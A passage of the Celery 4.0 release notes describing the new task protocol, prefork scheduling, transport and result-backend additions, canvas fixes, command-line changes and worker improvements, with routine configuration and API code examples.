------------------------- Priority 0 is now lowest, 9 is highest. This change was made to make priority support consistent with how it works in AMQP. Contributed by **Alex Koshelev**. Django: Auto-discover now supports Django app configurations ------------------------------------------------------------ The ``autodiscover_tasks()`` function can now be called without arguments, and the Django handler will automatically find your installed apps: .. code-block:: python app.autodiscover_tasks() The Django integration :ref:`example in the documentation ` has been updated to use the argument-less call. This also ensures compatibility with the new, ehm, ``AppConfig`` stuff introduced in recent Django versions. Worker direct queues no longer use auto-delete ---------------------------------------------- Workers/clients running 4.0 will no longer be able to send worker direct messages to workers running older versions, and vice versa. If you're relying on worker direct messages you should upgrade your 3.x workers and clients to use the new routing settings first, by replacing :func:`celery.utils.worker_direct` with this implementation: .. 
code-block:: python

    from kombu import Exchange, Queue

    worker_direct_exchange = Exchange('C.dq2')

    def worker_direct(hostname):
        return Queue(
            '{hostname}.dq2'.format(hostname=hostname),
            exchange=worker_direct_exchange,
            routing_key=hostname,
        )

This feature closed Issue #2492.

Old command-line programs removed
---------------------------------

Installing Celery will no longer install the ``celeryd``, ``celerybeat`` and ``celeryd-multi`` programs.

This was announced with the release of Celery 3.1, but you may still have scripts pointing to the old names, so make sure you update these to use the new umbrella command:

+-------------------+--------------+-------------------------------------+
| Program           | New Status   | Replacement                         |
+===================+==============+=====================================+
| ``celeryd``       | **REMOVED**  | :program:`celery worker`            |
+-------------------+--------------+-------------------------------------+
| ``celerybeat``    | **REMOVED**  | :program:`celery beat`              |
+-------------------+--------------+-------------------------------------+
| ``celeryd-multi`` | **REMOVED**  | :program:`celery multi`             |
+-------------------+--------------+-------------------------------------+

.. _v400-news:

News
====

New protocol highlights
-----------------------

The new protocol fixes many problems with the old one, and enables some long-requested features:

- Most of the data are now sent as message headers, instead of being serialized with the message body.

  In version 1 of the protocol the worker always had to deserialize the message to be able to read task meta-data like the task id, name, etc.

  This also meant that the worker was forced to double-decode the data: first deserializing the message on receipt, serializing the message again to send to the child process, then finally the child process deserializes the message again.

  Keeping the meta-data fields in the message headers means the worker doesn't actually have to decode the payload before delivering the task to the child process, and also that it's now possible for the worker to reroute a task written in a language different from Python to a different worker.

- A new ``lang`` message header can be used to specify the programming language the task is written in.

- Worker stores results for internal errors like ``ContentDisallowed``, and other deserialization errors.

- Worker stores results and sends monitoring events for unregistered task errors.

- Worker calls callbacks/errbacks even when the result is sent by the parent process (e.g., :exc:`WorkerLostError` when a child process terminates, deserialization errors, unregistered tasks).

- A new ``origin`` header contains information about the process sending the task (worker node-name, or PID and host-name information).

- A new ``shadow`` header allows you to modify the task name used in logs.

  This is useful for dispatch-like patterns, like a task that calls any function using pickle (don't do this at home):

  .. code-block:: python

      from celery import Task
      from celery.utils.imports import qualname

      class call_as_task(Task):

          def shadow_name(self, args, kwargs, options):
              return 'call_as_task:{0}'.format(qualname(args[0]))

          def run(self, fun, *args, **kwargs):
              return fun(*args, **kwargs)

      call_as_task = app.register_task(call_as_task())

- New ``argsrepr`` and ``kwargsrepr`` fields contain textual representations of the task arguments (possibly truncated) for use in logs, monitors, etc.
This means the worker doesn't have to deserialize the message payload to display the task arguments for informational purposes. - Chains now use a dedicated ``chain`` field enabling support for chains of thousands and more tasks. - New ``parent_id`` and ``root_id`` headers adds information about a tasks relationship with other tasks. - ``parent_id`` is the task id of the task that called this task - ``root_id`` is the first task in the work-flow. These fields can be used to improve monitors like flower to group related messages together (like chains, groups, chords, complete work-flows, etc). - ``app.TaskProducer`` replaced by :meth:`@amqp.create_task_message` and :meth:`@amqp.send_task_message`. Dividing the responsibilities into creating and sending means that people who want to send messages using a Python AMQP client directly, don't have to implement the protocol. The :meth:`@amqp.create_task_message` method calls either :meth:`@amqp.as_task_v2`, or :meth:`@amqp.as_task_v1` depending on the configured task protocol, and returns a special :class:`~celery.app.amqp.task_message` tuple containing the headers, properties and body of the task message. .. seealso:: The new task protocol is documented in full here: :ref:`message-protocol-task-v2`. Prefork Pool Improvements ------------------------- Tasks now log from the child process ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Logging of task success/failure now happens from the child process executing the task. As a result logging utilities, like Sentry can get full information about tasks, including variables in the traceback stack. ``-Ofair`` is now the default scheduling strategy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ To re-enable the default behavior in 3.1 use the ``-Ofast`` command-line option. There's been lots of confusion about what the ``-Ofair`` command-line option does, and using the term "prefetch" in explanations have probably not helped given how confusing this terminology is in AMQP. When a Celery worker using the prefork pool receives a task, it needs to delegate that task to a child process for execution. The prefork pool has a configurable number of child processes (``--concurrency``) that can be used to execute tasks, and each child process uses pipes/sockets to communicate with the parent process: - inqueue (pipe/socket): parent sends task to the child process - outqueue (pipe/socket): child sends result/return value to the parent. In Celery 3.1 the default scheduling mechanism was simply to send the task to the first ``inqueue`` that was writable, with some heuristics to make sure we round-robin between them to ensure each child process would receive the same amount of tasks. This means that in the default scheduling strategy, a worker may send tasks to the same child process that is already executing a task. If that task is long running, it may block the waiting task for a long time. Even worse, hundreds of short-running tasks may be stuck behind a long running task even when there are child processes free to do work. The ``-Ofair`` scheduling strategy was added to avoid this situation, and when enabled it adds the rule that no task should be sent to the a child process that is already executing a task. The fair scheduling strategy may perform slightly worse if you have only short running tasks. Limit child process resident memory size ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ .. 
:sha:`5cae0e754128750a893524dcba4ae030c414de33` You can now limit the maximum amount of memory allocated per prefork pool child process by setting the worker :option:`--max-memory-per-child ` option, or the :setting:`worker_max_memory_per_child` setting. The limit is for RSS/resident memory size and is specified in kilobytes. A child process having exceeded the limit will be terminated and replaced with a new process after the currently executing task returns. See :ref:`worker-max-memory-per-child` for more information. Contributed by **Dave Smith**. One log-file per child process ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Init-scrips and :program:`celery multi` now uses the `%I` log file format option (e.g., :file:`/var/log/celery/%n%I.log`). This change was necessary to ensure each child process has a separate log file after moving task logging to the child process, as multiple processes writing to the same log file can cause corruption. You're encouraged to upgrade your init-scripts and :program:`celery multi` arguments to use this new option. Transports ---------- RabbitMQ priority queue support ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ See :ref:`routing-options-rabbitmq-priorities` for more information. Contributed by **Gerald Manipon**. Configure broker URL for read/write separately ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ New :setting:`broker_read_url` and :setting:`broker_write_url` settings have been added so that separate broker URLs can be provided for connections used for consuming/publishing. In addition to the configuration options, two new methods have been added the app API: - ``app.connection_for_read()`` - ``app.connection_for_write()`` These should now be used in place of ``app.connection()`` to specify the intent of the required connection. .. note:: Two connection pools are available: ``app.pool`` (read), and ``app.producer_pool`` (write). The latter doesn't actually give connections but full :class:`kombu.Producer` instances. .. code-block:: python def publish_some_message(app, producer=None): with app.producer_or_acquire(producer) as producer: ... def consume_messages(app, connection=None): with app.connection_or_acquire(connection) as connection: ... RabbitMQ queue extensions support ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Queue declarations can now set a message TTL and queue expiry time directly, by using the ``message_ttl`` and ``expires`` arguments New arguments have been added to :class:`~kombu.Queue` that lets you directly and conveniently configure RabbitMQ queue extensions in queue declarations: - ``Queue(expires=20.0)`` Set queue expiry time in float seconds. See :attr:`kombu.Queue.expires`. - ``Queue(message_ttl=30.0)`` Set queue message time-to-live float seconds. See :attr:`kombu.Queue.message_ttl`. - ``Queue(max_length=1000)`` Set queue max length (number of messages) as int. See :attr:`kombu.Queue.max_length`. - ``Queue(max_length_bytes=1000)`` Set queue max length (message size total in bytes) as int. See :attr:`kombu.Queue.max_length_bytes`. - ``Queue(max_priority=10)`` Declare queue to be a priority queue that routes messages based on the ``priority`` field of the message. See :attr:`kombu.Queue.max_priority`. Amazon SQS transport now officially supported ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The SQS broker transport has been rewritten to use async I/O and as such joins RabbitMQ, Redis and QPid as officially supported transports. The new implementation also takes advantage of long polling, and closes several issues related to using SQS as a broker. 
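As a rough illustration of pointing Celery at SQS, here is a minimal sketch; the option values are illustrative only, and AWS credentials are assumed to come from the environment.

.. code-block:: python

    from celery import Celery

    # Credentials are assumed to be provided by the environment/boto config.
    app = Celery('proj', broker='sqs://')

    # Illustrative transport options; tune these for your deployment.
    app.conf.broker_transport_options = {
        'queue_name_prefix': 'celery-',  # namespace the SQS queues
        'visibility_timeout': 3600,      # seconds before an unacked task reappears
        'polling_interval': 1,           # seconds between polls
    }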
This work was sponsored by Nextdoor. Apache QPid transport now officially supported ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Contributed by **Brian Bouterse**. Redis: Support for Sentinel --------------------------- You can point the connection to a list of sentinel URLs like: .. code-block:: text sentinel://0.0.0.0:26379;sentinel://0.0.0.0:26380/... where each sentinel is separated by a `;`. Multiple sentinels are handled by :class:`kombu.Connection` constructor, and placed in the alternative list of servers to connect to in case of connection failure. Contributed by **Sergey Azovskov**, and **Lorenzo Mancini**. Tasks ----- Task Auto-retry Decorator ~~~~~~~~~~~~~~~~~~~~~~~~~ Writing custom retry handling for exception events is so common that we now have built-in support for it. For this a new ``autoretry_for`` argument is now supported by the task decorators, where you can specify a tuple of exceptions to automatically retry for: .. code-block:: python from twitter.exceptions import FailWhaleError @app.task(autoretry_for=(FailWhaleError,)) def refresh_timeline(user): return twitter.refresh_timeline(user) See :ref:`task-autoretry` for more information. Contributed by **Dmitry Malinovsky**. .. :sha:`75246714dd11e6c463b9dc67f4311690643bff24` ``Task.replace`` Improvements ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ - ``self.replace(signature)`` can now replace any task, chord or group, and the signature to replace with can be a chord, group or any other type of signature. - No longer inherits the callbacks and errbacks of the existing task. If you replace a node in a tree, then you wouldn't expect the new node to inherit the children of the old node. - ``Task.replace_in_chord`` has been removed, use ``.replace`` instead. - If the replacement is a group, that group will be automatically converted to a chord, where the callback "accumulates" the results of the group tasks. A new built-in task (`celery.accumulate` was added for this purpose) Contributed by **Steeve Morin**, and **Ask Solem**. Remote Task Tracebacks ~~~~~~~~~~~~~~~~~~~~~~ The new :setting:`task_remote_tracebacks` will make task tracebacks more useful by injecting the stack of the remote worker. This feature requires the additional :pypi:`tblib` library. Contributed by **Ionel Cristian Mărieș**. Handling task connection errors ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Connection related errors occurring while sending a task is now re-raised as a :exc:`kombu.exceptions.OperationalError` error: .. code-block:: pycon >>> try: ... add.delay(2, 2) ... except add.OperationalError as exc: ... print('Could not send task %r: %r' % (add, exc)) See :ref:`calling-connection-errors` for more information. Gevent/Eventlet: Dedicated thread for consuming results ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ When using :pypi:`gevent`, or :pypi:`eventlet` there is now a single thread responsible for consuming events. This means that if you have many calls retrieving results, there will be a dedicated thread for consuming them: .. code-block:: python result = add.delay(2, 2) # this call will delegate to the result consumer thread: # once the consumer thread has received the result this greenlet can # continue. value = result.get(timeout=3) This makes performing RPC calls when using gevent/eventlet perform much better. ``AsyncResult.then(on_success, on_error)`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The AsyncResult API has been extended to support the :class:`~vine.promise` protocol. 
This currently only works with the RPC (amqp) and Redis result backends, but lets you attach callbacks to when tasks finish:

.. code-block:: python

    from gevent import monkey
    monkey.patch_all()

    import time

    from celery import Celery

    app = Celery(broker='amqp://', backend='rpc')

    @app.task
    def add(x, y):
        return x + y

    def on_result_ready(result):
        print('Received result for id %r: %r' % (result.id, result.result,))

    add.delay(2, 2).then(on_result_ready)

    time.sleep(3)  # run gevent event loop for a while.

Demonstrated using :pypi:`gevent` here, but really this is an API that's more useful in callback-based event loops like :pypi:`twisted`, or :pypi:`tornado`.

New Task Router API
~~~~~~~~~~~~~~~~~~~

The :setting:`task_routes` setting can now hold functions, and map routes now support glob patterns and regexes.

Instead of using router classes you can now simply define a function:

.. code-block:: python

    def route_for_task(name, args, kwargs, options, task=None, **kw):
        from proj import tasks

        if name == tasks.add.name:
            return {'queue': 'hipri'}

If you don't need the arguments you can use star arguments, just make sure you always also accept star arguments so that we have the ability to add more features in the future:

.. code-block:: python

    def route_for_task(name, *args, **kwargs):
        from proj import tasks

        if name == tasks.add.name:
            return {'queue': 'hipri', 'priority': 9}

Both the ``options`` argument and the new ``task`` keyword argument are new to the function-style routers, and will make it easier to write routers based on execution options, or properties of the task.

The optional ``task`` keyword argument won't be set if a task is called by name using :meth:`@send_task`.

For more examples, including using glob/regexes in routers please see :setting:`task_routes` and :ref:`routing-automatic`.

Canvas Refactor
~~~~~~~~~~~~~~~

The canvas/work-flow implementation has been heavily refactored to fix some long outstanding issues.

.. :sha:`d79dcd8e82c5e41f39abd07ffed81ca58052bcd2`
.. :sha:`1e9dd26592eb2b93f1cb16deb771cfc65ab79612`
.. :sha:`e442df61b2ff1fe855881c1e2ff9acc970090f54`
.. :sha:`0673da5c09ac22bdd49ba811c470b73a036ee776`

- Error callbacks can now take real exception and traceback instances (Issue #2538).

  .. code-block:: pycon

      >>> add.s(2, 2).on_error(log_error.s()).delay()

  Where ``log_error`` could be defined as:

  .. code-block:: python

      import os

      @app.task
      def log_error(request, exc, traceback):
          with open(os.path.join('/var/errors', request.id), 'a') as fh:
              print('--\n\n{0} {1} {2}'.format(
                  request.id, exc, traceback), file=fh)

  See :ref:`guide-canvas` for more examples.

- ``chain(a, b, c)`` now works the same as ``a | b | c``.

  This means chain may no longer return an instance of ``chain``, instead it may optimize the workflow so that e.g. two groups chained together becomes one group.

- Now unrolls groups within groups into a single group (Issue #1509).

- chunks/map/starmap tasks now route based on the target task.

- chords and chains can now be immutable.

- Fixed bug where serialized signatures weren't converted back into signatures (Issue #2078).

  Fix contributed by **Ross Deane**.

- Fixed problem where chains and groups didn't work when using JSON serialization (Issue #2076).

  Fix contributed by **Ross Deane**.

- Creating a chord no longer results in multiple values for keyword argument 'task_id' (Issue #2225).

  Fix contributed by **Aneil Mallavarapu**.

- Fixed issue where the wrong result is returned when a chain contains a chord as the penultimate task.

  Fix contributed by **Aneil Mallavarapu**.
- Special case of ``group(A.s() | group(B.s() | C.s()))`` now works. - Chain: Fixed bug with incorrect id set when a subtask is also a chain. - ``group | group`` is now flattened into a single group (Issue #2573). - Fixed issue where ``group | task`` wasn't upgrading correctly to chord (Issue #2922). - Chords now properly sets ``result.parent`` links. - ``chunks``/``map``/``starmap`` are now routed based on the target task. - ``Signature.link`` now works when argument is scalar (not a list) (Issue #2019). - ``group()`` now properly forwards keyword arguments (Issue #3426). Fix contributed by **Samuel Giffard**. - A ``chord`` where the header group only consists of a single task is now turned into a simple chain. - Passing a ``link`` argument to ``group.apply_async()`` now raises an error (Issue #3508). - ``chord | sig`` now attaches to the chord callback (Issue #3356). Periodic Tasks -------------- New API for configuring periodic tasks ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This new API enables you to use signatures when defining periodic tasks, removing the chance of mistyping task names. An example of the new API is :ref:`here `. .. :sha:`bc18d0859c1570f5eb59f5a969d1d32c63af764b` .. :sha:`132d8d94d38f4050db876f56a841d5a5e487b25b` Optimized Beat implementation ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The :program:`celery beat` implementation has been optimized for millions of periodic tasks by using a heap to schedule entries. Contributed by **Ask Solem** and **Alexander Koshelev**. Schedule tasks based on sunrise, sunset, dawn and dusk ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ See :ref:`beat-solar` for more information. Contributed by **Mark Parncutt**. Result Backends --------------- RPC Result Backend matured ~~~~~~~~~~~~~~~~~~~~~~~~~~ Lots of bugs in the previously experimental RPC result backend have been fixed and can now be considered to production use. Contributed by **Ask Solem**, **Morris Tweed**. Redis: Result backend optimizations ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ``result.get()`` is now using pub/sub for streaming task results ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Calling ``result.get()`` when using the Redis result backend used to be extremely expensive as it was using polling to wait for the result to become available. A default polling interval of 0.5 seconds didn't help performance, but was necessary to avoid a spin loop. The new implementation is using Redis Pub/Sub mechanisms to publish and retrieve results immediately, greatly improving task round-trip times. Contributed by **Yaroslav Zhavoronkov** and **Ask Solem**. New optimized chord join implementation ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ This was an experimental feature introduced in Celery 3.1, that could only be enabled by adding ``?new_join=1`` to the result backend URL configuration. We feel that the implementation has been tested thoroughly enough to be considered stable and enabled by default. The new implementation greatly reduces the overhead of chords, and especially with larger chords the performance benefit can be massive. New Riak result backend introduced ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ See :ref:`conf-riak-result-backend` for more information. Contributed by **Gilles Dartiguelongue**, **Alman One** and **NoKriK**. New CouchDB result backend introduced ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ See :ref:`conf-couchdb-result-backend` for more information. Contributed by **Nathan Van Gheem**. 
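To put the result-backend changes above in context, here is a minimal sketch of configuring a backend and retrieving a result. The Redis URLs are placeholders; any of the backends mentioned in this section could be substituted.

.. code-block:: python

    from celery import Celery

    # Placeholder URLs; substitute your own broker and result backend.
    app = Celery('proj',
                 broker='redis://localhost:6379/0',
                 backend='redis://localhost:6379/1')

    @app.task
    def add(x, y):
        return x + y

    # With the Redis backend, .get() now waits on a Pub/Sub channel instead of
    # polling, so the result arrives as soon as it's stored.
    result = add.delay(2, 2)
    print(result.get(timeout=10))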
New Consul result backend introduced ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Add support for Consul as a backend using the Key/Value store of Consul. Consul has an HTTP API where through you can store keys with their values. The backend extends KeyValueStoreBackend and implements most of the methods. Mainly to set, get and remove objects. This allows Celery to store Task results in the K/V store of Consul. Consul also allows to set a TTL on keys using the Sessions from Consul. This way the backend supports auto expiry of Task results. For more information on Consul visit https://consul.io/ The backend uses :pypi:`python-consul` for talking to the HTTP API. This package is fully Python 3 compliant just as this backend is: .. code-block:: console $ pip install python-consul That installs the required package to talk to Consul's HTTP API from Python. You can also specify consul as an extension in your dependency on Celery: .. code-block:: console $ pip install celery[consul] See :ref:`bundles` for more information. Contributed by **Wido den Hollander**. Brand new Cassandra result backend ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ A brand new Cassandra backend utilizing the new :pypi:`cassandra-driver` library is replacing the old result backend using the older :pypi:`pycassa` library. See :ref:`conf-cassandra-result-backend` for more information. To depend on Celery with Cassandra as the result backend use: .. code-block:: console $ pip install celery[cassandra] You can also combine multiple extension requirements, please see :ref:`bundles` for more information. .. # XXX What changed? New Elasticsearch result backend introduced ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ See :ref:`conf-elasticsearch-result-backend` for more information. To depend on Celery with Elasticsearch as the result bakend use: .. code-block:: console $ pip install celery[elasticsearch] You can also combine multiple extension requirements, please see :ref:`bundles` for more information. Contributed by **Ahmet Demir**. New File-system result backend introduced ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ See :ref:`conf-filesystem-result-backend` for more information. Contributed by **Môshe van der Sterre**. Event Batching -------------- Events are now buffered in the worker and sent as a list, reducing the overhead required to send monitoring events. For authors of custom event monitors there will be no action required as long as you're using the Python Celery helpers (:class:`~@events.Receiver`) to implement your monitor. However, if you're parsing raw event messages you must now account for batched event messages, as they differ from normal event messages in the following way: - The routing key for a batch of event messages will be set to ``.multi`` where the only batched event group is currently ``task`` (giving a routing key of ``task.multi``). - The message body will be a serialized list-of-dictionaries instead of a dictionary. Each item in the list can be regarded as a normal event message body. .. :sha:`03399b4d7c26fb593e61acf34f111b66b340ba4e` In Other News... ---------------- Requirements ~~~~~~~~~~~~ - Now depends on :ref:`Kombu 4.0 `. - Now depends on :pypi:`billiard` version 3.5. - No longer depends on :pypi:`anyjson`. Good-bye old friend :( Tasks ~~~~~ - The "anon-exchange" is now used for simple name-name direct routing. This increases performance as it completely bypasses the routing table, in addition it also improves reliability for the Redis broker transport. - An empty ResultSet now evaluates to True. 
Fix contributed by **Colin McIntosh**. - The default routing key (:setting:`task_default_routing_key`) and exchange name (:setting:`task_default_exchange`) is now taken from the :setting:`task_default_queue` setting. This means that to change the name of the default queue, you now only have to set a single setting. - New :setting:`task_reject_on_worker_lost` setting, and :attr:`~@Task.reject_on_worker_lost` task attribute decides what happens when the child worker process executing a late ack task is terminated. Contributed by **Michael Permana**. - ``Task.subtask`` renamed to ``Task.signature`` with alias. - ``Task.subtask_from_request`` renamed to ``Task.signature_from_request`` with alias. - The ``delivery_mode`` attribute for :class:`kombu.Queue` is now respected (Issue #1953). - Routes in :setting:`task-routes` can now specify a :class:`~kombu.Queue` instance directly. Example: .. code-block:: python task_routes = {'proj.tasks.add': {'queue': Queue('add')}} - ``AsyncResult`` now raises :exc:`ValueError` if task_id is None. (Issue #1996). - Retried tasks didn't forward expires setting (Issue #3297). - ``result.get()`` now supports an ``on_message`` argument to set a callback to be called for every message received. - New abstract classes added: - :class:`~celery.utils.abstract.CallableTask` Looks like a task. - :class:`~celery.utils.abstract.CallableSignature` Looks like a task signature. - ``Task.replace`` now properly forwards callbacks (Issue #2722). Fix contributed by **Nicolas Unravel**. - ``Task.replace``: Append to chain/chord (Closes #3232) Fixed issue #3232, adding the signature to the chain (if there's any). Fixed the chord suppress if the given signature contains one. Fix contributed by :github_user:`honux`. - Task retry now also throws in eager mode. Fix contributed by **Feanil Patel**. Beat ~~~~ - Fixed crontab infinite loop with invalid date. When occurrence can never be reached (example, April, 31th), trying to reach the next occurrence would trigger an infinite loop. Try fixing that by raising a :exc:`RuntimeError` after 2,000 iterations (Also added a test for crontab leap years in the process) Fix contributed by **Romuald Brunet**. - Now ensures the program exits with a non-zero exit code when an exception terminates the service. Fix contributed by **Simon Peeters**. App ~~~ - Dates are now always timezone aware even if :setting:`enable_utc` is disabled (Issue #943). Fix contributed by **Omer Katz**. - **Config**: App preconfiguration is now also pickled with the configuration. Fix contributed by **Jeremy Zafran**. - The application can now change how task names are generated using the :meth:`~@gen_task_name` method. Contributed by **Dmitry Malinovsky**. - App has new ``app.current_worker_task`` property that returns the task that's currently being worked on (or :const:`None`). (Issue #2100). Logging ~~~~~~~ - :func:`~celery.utils.log.get_task_logger` now raises an exception if trying to use the name "celery" or "celery.task" (Issue #3475). Execution Pools ~~~~~~~~~~~~~~~ - **Eventlet/Gevent**: now enables AMQP heartbeat (Issue #3338). - **Eventlet/Gevent**: Fixed race condition leading to "simultaneous read" errors (Issue #2755). - **Prefork**: Prefork pool now uses ``poll`` instead of ``select`` where available (Issue #2373). - **Prefork**: Fixed bug where the pool would refuse to shut down the worker (Issue #2606). - **Eventlet**: Now returns pool size in :program:`celery inspect stats` command. Contributed by **Alexander Oblovatniy**. 
Testing
-------

- Celery is now a :pypi:`pytest` plugin, including fixtures useful for unit and integration testing.

  See the :ref:`testing user guide ` for more information.

Transports
~~~~~~~~~~

- ``amqps://`` can now be specified to require SSL.

- **Redis Transport**: The Redis transport now supports the :setting:`broker_use_ssl` option.

  Contributed by **Robert Kolba**.

- JSON serializer now calls ``obj.__json__`` for unsupported types.

  This means you can now define a ``__json__`` method for custom types that can be reduced down to a built-in json type.

  Example:

  .. code-block:: python

      class Person:
          first_name = None
          last_name = None
          address = None

          def __json__(self):
              return {
                  'first_name': self.first_name,
                  'last_name': self.last_name,
                  'address': self.address,
              }

- JSON serializer now handles datetimes, Django promises, UUID and Decimal.

- New ``Queue.consumer_arguments`` can be used for the ability to set consumer priority via ``x-priority``.

  See https://www.rabbitmq.com/consumer-priority.html

  Example:

  .. code-block:: python

      consumer = Consumer(channel, consumer_arguments={'x-priority': 3})

- Queue/Exchange: ``no_declare`` option added (also enabled for internal amq. exchanges).

Programs
~~~~~~~~

- Celery is now using :mod:`argparse`, instead of :mod:`optparse`.

- All programs now disable colors if the controlling terminal is not a TTY.

- :program:`celery worker`: The ``-q`` argument now disables the startup banner.

- :program:`celery worker`: The "worker ready" message is now logged using severity info, instead of warn.

- :program:`celery multi`: The ``%n`` format is now a synonym for ``%N``, to be consistent with :program:`celery worker`.

- :program:`celery inspect`/:program:`celery control`: now supports a new :option:`--json ` option to give output in json format.

- :program:`celery inspect registered`: now ignores built-in tasks.

- :program:`celery purge` now takes ``-Q`` and ``-X`` options used to specify what queues to include and exclude from the purge.

- New :program:`celery logtool`: Utility for filtering and parsing celery worker log-files.

- :program:`celery multi`: now passes through `%i` and `%I` log file formats.

- General: ``%p`` can now be used to expand to the full worker node-name in log-file/pid-file arguments.

- A new command line option :option:`--executable ` is now available for daemonizing programs (:program:`celery worker` and :program:`celery beat`).

  Contributed by **Bert Vanderbauwhede**.

- :program:`celery worker`: supports new :option:`--prefetch-multiplier ` option.

  Contributed by **Mickaël Penhard**.

- The ``--loader`` argument is now always effective even if an app argument is set (Issue #3405).

- inspect/control now takes commands from the registry.

  This means user remote-control commands can also be used from the command-line.

  Note that you need to specify the arguments and the type of each argument for them to be correctly passed on the command-line.

  There are now two decorators, and which one to use depends on the type of command: `@inspect_command` and `@control_command`:

  .. code-block:: python

      from celery.worker.control import control_command

      @control_command(
          args=[('n', int)],
          signature='[N=1]',
      )
      def something(state, n=1, **kwargs):
          ...

  Here ``args`` is a list of args supported by the command. The list must contain tuples of ``(argument_name, type)``.

  ``signature`` is just the command-line help used in e.g. ``celery -A proj control --help``.

  Commands also support `variadic` arguments, which means that any arguments left over will be added to a single variable.
Here demonstrated by the ``terminate`` command which takes a signal argument and a variable number of task_ids: .. code-block:: python from celery.worker.control import control_command @control_command( args=[('signal', str)], signature=' [id1, [id2, [..., [idN]]]]', variadic='ids', ) def terminate(state, signal, ids, **kwargs): ... This command can now be called using: .. code-block:: console $ celery -A proj control terminate SIGKILL id1 id2 id3` See :ref:`worker-custom-control-commands` for more information. Worker ~~~~~~ - Improvements and fixes for :class:`~celery.utils.collections.LimitedSet`. Getting rid of leaking memory + adding ``minlen`` size of the set: the minimal residual size of the set after operating for some time. ``minlen`` items are kept, even if they should've been expired. Problems with older and even more old code: #. Heap would tend to grow in some scenarios (like adding an item multiple times). #. Adding many items fast wouldn't clean them soon enough (if ever). #. When talking to other workers, revoked._data was sent, but it was processed on the other side as iterable. That means giving those keys new (current) time-stamp. By doing this workers could recycle items forever. Combined with 1) and 2), this means that in large set of workers, you're getting out of memory soon. All those problems should be fixed now. This should fix issues #3095, #3086. Contributed by **David Pravec**. - New settings to control remote control command queues. - :setting:`control_queue_expires` Set queue expiry time for both remote control command queues, and remote control reply queues. - :setting:`control_queue_ttl` Set message time-to-live for both remote control command queues, and remote control reply queues. Contributed by **Alan Justino**. - The :signal:`worker_shutdown` signal is now always called during shutdown. Previously it would not be called if the worker instance was collected by gc first. - Worker now only starts the remote control command consumer if the broker transport used actually supports them. - Gossip now sets ``x-message-ttl`` for event queue to heartbeat_interval s. (Issue #2005). - Now preserves exit code (Issue #2024). - Now rejects messages with an invalid ETA value (instead of ack, which means they will be sent to the dead-letter exchange if one is configured). - Fixed crash when the ``-purge`` argument was used. - Log--level for unrecoverable errors changed from ``error`` to ``critical``. - Improved rate limiting accuracy. - Account for missing timezone information in task expires field. Fix contributed by **Albert Wang**. - The worker no longer has a ``Queues`` bootsteps, as it is now superfluous. - Now emits the "Received task" line even for revoked tasks. (Issue #3155). - Now respects :setting:`broker_connection_retry` setting. Fix contributed by **Nat Williams**. - New :setting:`control_queue_ttl` and :setting:`control_queue_expires` settings now enables you to configure remote control command message TTLs, and queue expiry time. Contributed by **Alan Justino**. - New :data:`celery.worker.state.requests` enables O(1) loookup of active/reserved tasks by id. - Auto-scale didn't always update keep-alive when scaling down. Fix contributed by **Philip Garnero**. - Fixed typo ``options_list`` -> ``option_list``. Fix contributed by **Greg Wilbur**. - Some worker command-line arguments and ``Worker()`` class arguments have been renamed for consistency. All of these have aliases for backward compatibility. 
- ``--send-events`` -> ``--task-events`` - ``--schedule`` -> ``--schedule-filename`` - ``--maxtasksperchild`` -> ``--max-tasks-per-child`` - ``Beat(scheduler_cls=)`` -> ``Beat(scheduler=)`` - ``Worker(send_events=True)`` -> ``Worker(task_events=True)`` - ``Worker(task_time_limit=)`` -> ``Worker(time_limit=``) - ``Worker(task_soft_time_limit=)`` -> ``Worker(soft_time_limit=)`` - ``Worker(state_db=)`` -> ``Worker(statedb=)`` - ``Worker(working_directory=)`` -> ``Worker(workdir=)`` Debugging Utilities ~~~~~~~~~~~~~~~~~~~ - :mod:`celery.contrib.rdb`: Changed remote debugger banner so that you can copy and paste the address easily (no longer has a period in the address). Contributed by **Jonathan Vanasco**. - Fixed compatibility with recent :pypi:`psutil` versions (Issue #3262). Signals ~~~~~~~ - **App**: New signals for app configuration/finalization: - :data:`app.on_configure <@on_configure>` - :data:`app.on_after_configure <@on_after_configure>` - :data:`app.on_after_finalize <@on_after_finalize>` - **Task**: New task signals for rejected task messages: - :data:`celery.signals.task_rejected`. - :data:`celery.signals.task_unknown`. - **Worker**: New signal for when a heartbeat event is sent. - :data:`celery.signals.heartbeat_sent` Contributed by **Kevin Richardson**. Events ~~~~~~ - Event messages now uses the RabbitMQ ``x-message-ttl`` option to ensure older event messages are discarded. The default is 5 seconds, but can be changed using the :setting:`event_queue_ttl` setting. - ``Task.send_event`` now automatically retries sending the event on connection failure, according to the task publish retry settings. - Event monitors now sets the 